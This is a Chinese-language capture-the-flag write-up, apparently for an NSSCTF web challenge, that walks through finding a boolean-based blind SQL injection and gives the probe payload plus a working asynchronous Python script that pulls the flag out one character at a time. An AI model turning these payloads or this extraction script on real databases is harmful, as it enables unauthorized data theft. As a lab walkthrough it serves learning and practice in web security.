image-20260315182333958

一进来就给了flag所在的表名和列名,输入一个1,下面显示Hello, glzjin wants a girlfriend.

image-20260315182559934

输入2,显示**Do you want to be my girlfriend?

image-20260315182917629

又经过了几次尝试

image-20260315183115083

image-20260315183129327

发现注释都被过滤了,回过去一想1和2的不同显示,想到了布尔注入,于是我用了if函数来测试了一下

image-20260315183338954

image-20260315183359413

可以看到真的可以出现不同的结果,列名和表名都给了,输入***if(ascii(mid((select(flag)from(flag)),1,1))>0,1,2)***测试一下

image-20260315184216074

可以看到正确输出了对应1的那句话,既然是布尔盲注,总不会用手一个个测,接下来就是写脚本了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import  asyncio
import aiohttp
from chaos import solve

url = "http://node4.anna.nssctf.cn:xxxxx/index.php"
sem= asyncio.Semaphore(20)
async  def solve(session,_,c):
    async with sem:
        x= "select(flag)from(flag)"
        payload = {
            "id":f"if(ascii(mid(({x}),{_},1))={c},2,1)"
        }
        #print(payload['id'])
        async with session.post(url,data=payload) as resp:
            text = await resp.text()
            return chr(c) if "Do you want to be my girlfriend?" in text else None

async def main():
    async  with aiohttp.ClientSession() as session:
        for _ in range(1000):
            tasks=[]
            for c in range(32,127):
                tasks.append(asyncio.ensure_future(solve(session,_,c)))
            for task in asyncio.as_completed(tasks):
                result=await task
                if result:
                    print(result,end="")
                    for t in  tasks:
                        if not t.done():
                            t.cancel()
                    break

if __name__ == "__main__":
    asyncio.run(main())⏎

得到flag

image-20260315184638144